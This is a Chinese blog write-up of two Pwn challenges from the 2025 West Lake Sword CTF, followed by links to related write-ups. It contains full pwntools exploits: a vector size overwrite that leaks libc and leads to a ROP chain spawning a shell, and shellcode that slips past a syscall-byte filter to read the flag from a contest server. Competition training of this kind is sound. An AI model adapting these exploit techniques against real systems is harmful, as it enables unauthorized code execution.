2025第八届西湖论剑网络安全技能大赛WriteUp—Pwn篇

已于 2025-01-18 20:36:41 修改
阅读量1.3k 收藏 10
点赞数 7
分类专栏: CTF 文章标签: CTF 网络安全 二进制安全 Pwn
于 2025-01-18 20:09:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AtomTeam/article/details/145229171
版权

欢迎关注公众号【Real返璞归真】不定时更新网络安全相关技术文章:

img

公众号回复【2025西湖论剑】获取全部Writeup(pdf版)和Pwn附件下载地址。

Pwn

VPwn

拖入IDA分析,发现是对一个vetcor进行push、pop、print和edit操作。

image-20250118155731393

vector+24位置存储了vector的size大小:

image-20250118155824712

每次push元素时会+1,pop时会-1,print会根据这个大小从vector+0的位置以4字节为单位打印数据,edit也会根据这个size检查下标是否合法。

[vector+0, vector+24)为数据区域,共24字节大小,由于每个元素大小为4字节,因此可以存储6个元素。

但push操作没有对元素个数进行检查,如果我们push第7个元素,则会直接覆盖size,实现对size的任意修改。

先将size修改为很大的数:

# size->100
for i in range(7):
    p.sendlineafter(b'choice: ', b'2')
    p.sendlineafter(b'push: ', b'100')

然后调用print,由于size很大,会输出从vector开始的一堆栈上数据。

通过动态调试发现vector附近位置存在libc地址,计算偏移后得到libc基地址。由于输出以4字节为单位,我们需要对高4字节部分左移并加上低4字节部分。

计算偏移后得到libc基地址:

# leak libc
p.sendlineafter(b'choice: ', b'4')
p.recvuntil(b'contents: ')
msg = p.recvuntil(b'\n').split(b' ')

libc_base = (int(msg[19]) << 32) + (int(msg[18]) & 0xffffffff) - 0x29d90
libc.address = libc_base
success("libc_base = " + hex(libc_base))
ret = libc_base + 0x29139
pop_rdi = libc_base + 0x2a3e5
binsh = next(libc.search(b'/bin/sh\x00'))
system = libc.sym['system']

由于size很大,且vector在栈上,我们可以通过edit在栈上任意写。

直接计算偏移地址后在返回地址位置写ret(movaps对齐) -> pop_rdi -> binsh -> system即可。

同样,每次只能写4字节,因此一个地址需要分2次写入,先写入低地址部分,后写入高地址部分。

edit(18, str(ret & 0xFFFFFFFF).encode())
edit(19, str((ret >> 32) & 0xFFFFFFFF).encode())
edit(20, str(pop_rdi & 0xFFFFFFFF).encode())
edit(21, str((pop_rdi >> 32) & 0xFFFFFFFF).encode())
edit(22, str(binsh & 0xFFFFFFFF).encode())
edit(23, str((binsh >> 32) & 0xFFFFFFFF).encode())
edit(24, str(system & 0xFFFFFFFF).encode())
edit(25, str((system >> 32) & 0xFFFFFFFF).encode())

完整exp:

from pwn import *

elf = ELF("./pwn")
libc = ELF("./libc.so.6")
p = process([elf.path])

context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'

# size->100
for i in range(7):
    p.sendlineafter(b'choice: ', b'2')
    p.sendlineafter(b'push: ', b'100')

# leak libc
p.sendlineafter(b'choice: ', b'4')
p.recvuntil(b'contents: ')
msg = p.recvuntil(b'\n').split(b' ')

libc_base = (int(msg[19]) << 32) + (int(msg[18]) & 0xffffffff) - 0x29d90
libc.address = libc_base
success("libc_base = " + hex(libc_base))
ret = libc_base + 0x29139
pop_rdi = libc_base + 0x2a3e5
binsh = next(libc.search(b'/bin/sh\x00'))
system = libc.sym['system']

def edit(idx, content):
    p.sendlineafter(b'choice: ', b'1')
    p.sendlineafter(b'edit (0-based): ', str(idx).encode())
    p.sendlineafter(b'new value: ', content)

# ret_addr -> system("/bin/sh")
# gdb.attach(p, 'b *$rebase(0x1513)\nc')
# pause()

edit(18, str(ret & 0xFFFFFFFF).encode())
edit(19, str((ret >> 32) & 0xFFFFFFFF).encode())
edit(20, str(pop_rdi & 0xFFFFFFFF).encode())
edit(21, str((pop_rdi >> 32) & 0xFFFFFFFF).encode())
edit(22, str(binsh & 0xFFFFFFFF).encode())
edit(23, str((binsh >> 32) & 0xFFFFFFFF).encode())
edit(24, str(system & 0xFFFFFFFF).encode())
edit(25, str((system >> 32) & 0xFFFFFFFF).encode())

# gdb.attach(p, 'b *$rebase(0x17D0)\nc')
# pause()

p.sendlineafter(b'choice: ', b'5')

p.interactive()

Heaven’s door

拖入IDA分析,发现mmap开辟了一个可执行空间,允许读入shellcode并执行:

image-20250118151635049

但限制了0x05 0x0f(syscall的机器码)最多使用2次:

image-20250118151700901

查看沙箱保护:

image-20250118151728352

可以直接orw使用open + mmap映射 + write,但是会用到3次syscall无法通过程序的检查。

绕过方法:

  1. 前两次open和mmap正常使用syscall
  2. 第三次write,用\x90对齐机器码后,在syscall的位置写入高位0x05,用汇编命令在rip寄存器指向的低位补0x0f即可正常执行syscall(0x05 0x0f)。

完整exp:

from pwn import *

elf = ELF("./pwn")
libc = ELF("./libc.so.6")
p = process([elf.path])
p = remote("139.155.126.78", 31021)

context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'

shellcode = asm(shellcraft.open('flag', 0, 0))
shellcode += asm(shellcraft.mmap(0x20000, 0x1000, 1, 1, 'rax', 0))
shellcode += asm('''
mov rax,1
mov rdi,1
mov rsi,0x20000
mov rdx,0x50
mov byte ptr [rip],0x0f
''') + b'\x90\x05'

# gdb.attach(p)
# pause()

p.send(shellcode)

p.interactive()
2024 高校网络安全管理运维赛 -实践能力赛项Writeup(misc-4部分解析)
weixin_39435784的博客
05-09 428
1、f or r Got a new KB update from Macrohard. (提交flag时请删除所有空格)
西湖论剑2024中国杭州网络安全技能大赛部分题目WriteUp
Hacker_xingchen的博客
01-04 1245
具体来说,就是以check函数计算出的距离来看,与鹿的图片差距值小于一定阈值(100000),而用euclideanDistance(欧氏距离)作为依据又更接近马的图片。作为一个刚接触CTF不到3个月的小白,抱着来学习的想法,参加了西湖论剑·2024中国杭州网络安全技能大赛,只做出来2道题目,发一下WriteUp。发现e很大,我们知道一般e取值为65537,当加密指数e取得过大时,会导致解密指数d较小,存在低解密指数攻击的可能性。介绍大意是,有人黑进了加密系统并进行了篡改,剩下的就交给你了。
2025 西湖论剑wp
最新发布
2301_80552914的博客
02-12 725
打开题目环境:发现一个输入框,看一下他是用上面语言写的发现是python,很容易想到ssti密码随便输,发现没有回显但是输入其他字符会报错确定为ssti注入开始构造payload,’)|attr(‘经过测试,发现过滤了/这里使用构造器,联想到ctfshow上的题目由于已经知道了flag的名字,直接构造出来获取flag。
2019西湖论剑网络安全技能大赛(大学生组)部分WriteUp
weixin_30501857的博客
04-08 723
这次比赛是我参加以来成绩最好的一次,这离不开我们的小团队中任何一个人的努力,熬了一整天才答完题,差点饿死在工作室(门卫大爷出去散步,把大门锁了出不去,还好学弟提了几个盒饭用网线从窗户钓上来才吃到了午饭)。写好WP回到宿舍的时候已经快十二点了,随便吃了点面包倒头就睡...... 接下来大概写写我们的解题思路,由于做题的时候没想到可以进名次,而且赛后比赛平台也关了,所以很多实现过程的截图就...
2024第四届“网鼎杯”网络安全大赛官方资格赛全赛道全网最全最详细WriteUp(持续发布,敬请关注)
qq_44395288的博客
11-04 539
2024第四届“网鼎杯”网络安全大赛-白虎赛道-MISC04-WP
第五届强网杯全国网络安全挑战赛writeup
热门推荐
渗透测试研究中心
12-23 1万+
Web1.[强网先锋]寻宝下发赛题,访问链接如下:该题需要你通过信息 1 和信息 2 分别获取两段 Key 值,输入 Key1 和 Key2 然后解密。Key1之代码审计点击“信息1”,发现是代码审计:完整源码如下:<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__...
122222222222222222222
07-22 265
眼瞎了。看不清。无法验证。
网络安全 CTF 2024年全国职工职业技能大赛
10-02
2024年全国职工职业技能大赛网络安全CTF比赛,是在国家层面上对网络安全人才进行的一次专业能力的大比拼。这类比赛通常包含多个赛题,涵盖多种网络安全技术,如逆向工程(Reverse Engineering)、二进制分析...
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
山东省大学生网络安全技能大赛决赛Writeup.pdf
09-30
山东省大学生网络安全技能大赛决赛Writeup 本文档总结了山东省大学生网络安全技能大赛决赛的Writeup,涵盖了Crypto0x00 RSA1、RSA2和仿射加密三个部分的知识点。 Crypto0x00 RSA1 在Crypto0x00 RSA1部分中,我们...
第七届山东省大学生网络安全技能大赛决赛writeup
CoolD's Blog
11-06 7881
先立个flag,以后每次比赛完都要复现写WP…
2021强网杯全国网络安全挑战赛Writeup
道阻且长,行则将至
06-20 7938
文章目录前言强网先锋-赌徒PHP的魔术方法题目POP链构造强网先锋-寻宝Key1之代码审计Key2之脚本搜索 前言 上周末端午假期期间(6月12日9:00至6月13日21:00)参与了为期 36h 的第五届强网杯网络安全竞赛,不得不说题目比去年难多了,两天下来腰酸背痛脑壳疼……比赛的数据大致如下: 幸运的是最终在实力傍队友的情况下,又一年获得竞赛前 10% 有效排名的 “强网先锋” 称号,在此记录下比赛的 Writeup。 强网先锋-赌徒 1、下发赛题,访问地址如下: 2、结合题目源码提醒,利用 dir
2021年第一届 “东软杯”网络安全CTF竞赛-官方WriteUp(转)
渗透测试研究中心
12-22 2929
MISC1 签到难度 签到复制给出的flag输入即可2 range_download难度 中等flag{6095B134-5437-4B21-BE52-EDC46A276297}0x01分析dns流量,发现dns && ip.addr=1.1.1.1存在dns隧道数据,整理后得到base64:cGFzc3dvcmQ6IG5zc195eWRzIQ==解base64得到:passwo...
IMF_1(VulbHub)_WriteUp(1),2024年阿里网络安全面试题及答案
2401_83621095的博客
04-17 1078
为了防止缓冲区溢出这种情况的出现,在C库函数中,许多对字符串操作的函数都有其"n兄弟"版本,例如strncmp,strncat,snprintf……兄弟版本的基本行为不变,但是通常在参数中需要多给出一个整数n,用于限制操作的最大字符数量。strncmp(“dwqdq\n”, “48093572”, 8) = -1 ----正在将我提供的字符串与字符串48093572进行比较,在这种情况下导致=-1)。nmap 192.168.126.167 -p7788,80 ----这时候7788端口开启!
2022浙江省大学生信息安全竞赛技能赛初赛Writeup_2022年浙江省网络与信息安全竞赛 web
2501_90257224的博客
01-16 269
解开后得到一个缺少文件头的png,补上png文件头提示CRC校验错误,修改宽高后得到flag。
[Pwn] Writeup - 2025西湖论剑 - Pwn
Lufiende的博客
02-10 98
西湖论剑2025 Pwn 方向 WriteUp
比赛结束前还需要提交解题过程的Writeup
aheyor的博客
11-08 327
题目名称题目类型(如:Web安全、密码学、逆向工程等)题目描述本次解题的收获存在的不足和改进空间对题目出题人的建议(如有)
2024年第二届龙信杯writeup
qq_43491969的博客
10-01 4190
近期,某公安机关接到受害人报案:通过微信添加认识一位相亲中介客服,客服邀约其与“相亲”对象进行选妃,受害人上钩后,整个过程被涉案团伙录音录像,同时,该客服以有更多的对象可供挑选为由,引导受害人下载其事先制作好的木马APP,受害人安装该APP后,嫌疑人利用录制的视频和受害人的通讯录做要挟,从而实施多次诈骗。最终受害人不堪重负,选择报案。序号检材信息检材大小检材哈希(MD5)1受害人手机检材.dd24,226,000,896 字节2涉案计算机检材.E0112,510,412,800 字节。
西湖论剑安全大赛WriteUp分析
"西湖论剑WriteUp By Nu1L.pdf 是一份关于网络安全竞赛“西湖论剑”的解题报告,由Nu1L团队编写。报告涵盖了多个技术领域,包括Reverse(逆向工程)、ROR(Ruby on Rails框架漏洞利用)、TacticalArmed(可能涉及...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值